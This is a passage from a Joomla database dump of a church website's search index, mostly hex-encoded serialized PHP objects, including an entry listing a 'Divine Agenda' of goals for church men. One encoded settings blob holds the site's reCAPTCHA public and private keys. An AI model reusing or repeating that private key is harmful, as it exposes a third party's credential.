c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223235223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a35363a2235333a656d62726163652d6469736369706c696e652d66726f6d2d6f75722d6661746865722d732d68656172742d32352d30362d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a37343a22636f6d706f6e656e742f6b322f6974656d2f35332d656d62726163652d6469736369706c696e652d66726f6d2d6f75722d6661746865722d732d68656172742d32352d30362d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3533223b733a353a22726f757465223b733a39333a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d35333a656d62726163652d6469736369706c696e652d66726f6d2d6f75722d6661746865722d732d68656172742d32352d30362d32303137223b733a353a227469746c65223b733a35383a22456d6272616365206469736369706c696e6521202d2046726f6d206f7572204661746865722773204865617274202832352f30362f3230313729223b733a31313a226465736372697074696f6e223b733a3333323a2220456d6272616365206469736369706c696e652120546f206265206469736369706c696e6564206d65616e7320746f207265636569766520747261696e696e67207468617420636f72726563747320796f752c206d6f756c647320796f752c206f72207065726665637473206d6f72616c2063686172616374657220616e64206265686176696f757220696e20796f752e204974206d65616e732061646a757374696e6720696e7369646520746f20747261696e696e672e204974206d65616e73207468617420796f752068617665206163636570746564206469736369706c65736869702028746861742069732c206120736574206f662076616c7565732920616e64206861766520696e7465726e616c697365642069742073756368207468617420697420636f6e74726f6c7320616e64206166666563747320796f7572206465636973696f6e732e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30362d32352031333a31313a3138223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30362d32352031333a31313a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(287, 'index.php?option=com_k2&view=item&id=54', 'index.php?option=com_k2&view=item&id=54:divine-agenda&Itemid=1120', 'Divine Agenda for Dream Centre Men', ' Every dream centre man should: 1. Build their house 2. Pay off all debts 3. Have a saving equivalent to 6 months’ salary ', '2017-07-16 10:01:56', 'bfe3a10712eabd76e699b9ea78b752ef', 1, 1, 1, '*', '2017-07-04 20:22:52', '0000-00-00 00:00:00', '2017-07-04 20:22:52', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223534223b733a353a22616c696173223b733a31333a22646976696e652d6167656e6461223b733a373a2273756d6d617279223b733a3231313a223c703e457665727920647265616d2063656e747265206d616e2073686f756c643ac2a03c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e312e204275696c6420746865697220686f7573653c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e322e20506179206f666620616c6c2064656274733c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e332e2048617665206120736176696e67206571756976616c656e7420746f2036206d6f6e746873e280992073616c6172793c2f703e0d0a223b733a343a22626f6479223b733a313039363a220d0a3c7020636c6173733d224d736f4e6f726d616c223e342e2045737461626c69736820616e204e474f20746f20696e666c75656e63652061207365676d656e74206f662074686520736f636965747920666f72204368726973743c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e352e204265636f6d6520612066616d696c7920756e6974206c65616465723c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e362e2057696e2061206d696e696d756d206f6620313220736f756c7320706572736f6e616c6c7920746f2043687269737420696e20746865207965617220616e6420616464656420746f206368757263683c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e372e20436f6d706c657465204d494d4d50207468697320796561723c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e382e20446f6ee2809974206d6973732061206269626c65207374756479207365727669636520696e20746865207965617220776974686f757420612067656e75696e6520726561736f6e3c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e392e20417474656e642035322053756e6461792073657276696365733c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e31302e2050726f76696465207175616c697479206c65616465727368697020666f7220796f75722066616d696c793c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e31312e2045737461626c697368206174206c65617374206f6e65206164646974696f6e616c2073747265616d206f6620696e636f6d652061706172742066726f6d2073616c6172792063757272656e7420736f757263653c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e31322e2054616b6520796f75722073706f757365206f757420666f7220612066756e207765656b656e6420617761792066726f6d20686f6d653c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e31332e2050726179206174206c65617374206f6e6520686f75722061206461793c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e31342e2052656164207468726f75676820746865206269626c6520696e2074686520796561723c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e31352e20446f6ee2809974206d69737320612074697468653c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e31362e204163717569726520616e206164646974696f6e616c20736b696c6c207468697320796561723c2f703e0d0a3c703ec2a03c2f703e0d0a3c7020636c6173733d224d736f4e6f726d616c223e31372e20426520612070617274206f6620486561642051756172746572206275696c64696e6720696e206361736820616e6420696e206b696e642074696c6c2066696e697368696e672e3c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30372d31362031303a30313a3535223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c